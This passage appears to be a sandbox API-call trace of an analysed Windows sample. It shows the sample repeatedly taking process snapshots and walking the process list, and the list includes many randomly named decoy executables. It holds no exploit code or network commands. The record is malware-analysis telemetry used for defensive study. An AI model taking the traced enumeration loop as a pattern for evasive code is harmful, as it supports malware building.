th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0116.821] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0116.822] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0116.823] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0116.824] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0116.826] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0116.827] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0116.829] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0116.830] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0116.832] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0116.833] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0116.835] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0116.836] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0116.892] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0116.893] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.894] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0116.895] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0116.896] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0116.897] CloseHandle (hObject=0xbc) returned 1 [0116.897] Sleep (dwMilliseconds=0x12c) [0117.209] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0117.214] 
Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.215] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0117.216] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0117.217] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0117.218] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0117.219] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0117.219] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0117.220] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0117.221] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0117.221] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0117.222] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.223] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.224] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.224] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.225] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.225] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0117.226] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.227] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.228] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0117.229] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.230] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0117.231] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0117.232] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0117.233] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0117.234] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.235] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0117.237] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0117.238] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0117.239] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0117.241] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0117.242] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0117.307] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0117.308] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0117.310] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0117.311] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) 
returned 1 [0117.313] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0117.314] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0117.316] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0117.317] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0117.318] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0117.320] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0117.321] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="pickup.exe")) returned 1 [0117.323] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0117.324] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0117.325] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0117.327] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0117.328] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.329] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0117.331] CloseHandle (hObject=0xc4) returned 1 [0117.331] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0117.337] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.338] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0117.339] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0117.340] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0117.340] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0117.341] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0117.342] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0117.343] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0117.344] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0117.344] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0117.345] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.346] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.347] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.348] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.349] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
